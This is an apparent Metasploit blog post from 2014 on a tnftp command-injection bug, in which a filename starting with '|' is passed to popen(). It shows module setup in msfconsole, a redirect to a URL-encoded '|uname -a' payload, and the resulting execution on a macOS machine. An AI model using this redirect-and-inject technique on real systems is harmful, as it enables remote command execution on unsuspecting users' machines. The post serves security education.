This post is the sixth in a series, 12 Days of HaXmas, where we take a look at some of more notable advancements and events in the Metasploit Framework over the course of 2014.
It's been quite a year for shell bugs. Of course, we all know about Shellshock, the tragic bash bug that made the major media news. Most of us heard about the vulnerabilities in the command line tools wget, curl, and git (more on that last one later on during HaXmas). But did you notice the FTP command bug? That remains unpatched today on a fairly popular operating system? Read on...
popen()'ing an RCE present
The bug is rather simple, as explained (somewhat verbosely) by the description in the Metasploit module:
This module exploits an arbitrary command execution vulnerability in tnftp's handling of the resolved output filename - called "savefile" in the source - from a requested resource.
If tnftp is executed without the -o command-line option, it will resolvethe output filename from the last component of the requested resource.
If the output filename begins with a "|" character, tnftp will pass thefetched resource's output to the command directly following the "|" character through the use of the popen() function.
Okay, so how do we use this thing?
We can use Metasploit! Using
auxiliary/server/tnftp_savefile is pretty easy:
msf > use auxiliary/server/tnftp_savefile msf auxiliary(tnftp_savefile) > set uripath / uripath => / msf auxiliary(tnftp_savefile) > set urihost [redacted] urihost => [redacted] msf auxiliary(tnftp_savefile) > set uriport 80 uriport => 80 msf auxiliary(tnftp_savefile) > run [*] Auxiliary module execution completed msf auxiliary(tnftp_savefile) > [*] Using URL: http://0.0.0.0:8080/ [*] Local IP: http://10.6.0.59:8080/ [*] Server started.
Don't worry about the
URIPORT advanced options unless you're working through a tunnel. Just set
/ to allow any URL to redirect to the exploit.
Triggering the vulnerability
Here we are triggering the vuln on a fully patched OS X Yosemite system:
wvu@hiigara:~$ ftp http://[redacted]/index.html Requesting http://[redacted]/index.html Redirected to http://[redacted]:80/%7c%75%6e%61%6d%65%20%2d%61 Requesting http://[redacted]:80/%7c%75%6e%61%6d%65%20%2d%61 0 0.00 KiB/s Darwin hiigara 14.0.0 Darwin Kernel Version 14.0.0: Fri Sep 19 00:26:44 PDT 2014; root:xnu-2782.1.97~2/RELEASE_X86_64 x86_64 0 0.00 KiB/s wvu@hiigara:~$
Thanks to the redirect, we can hide the true purpose of our URL until it's too late.
Back in msfconsole, we can see the results of our attack:
[*] 10.6.0.59 tnftp_savefile - tnftp/20070806 connected [*] 10.6.0.59 tnftp_savefile - Redirecting to exploit... [+] 10.6.0.59 tnftp_savefile - Executing `uname -a'!
That's really all there is to it! Happy hacking!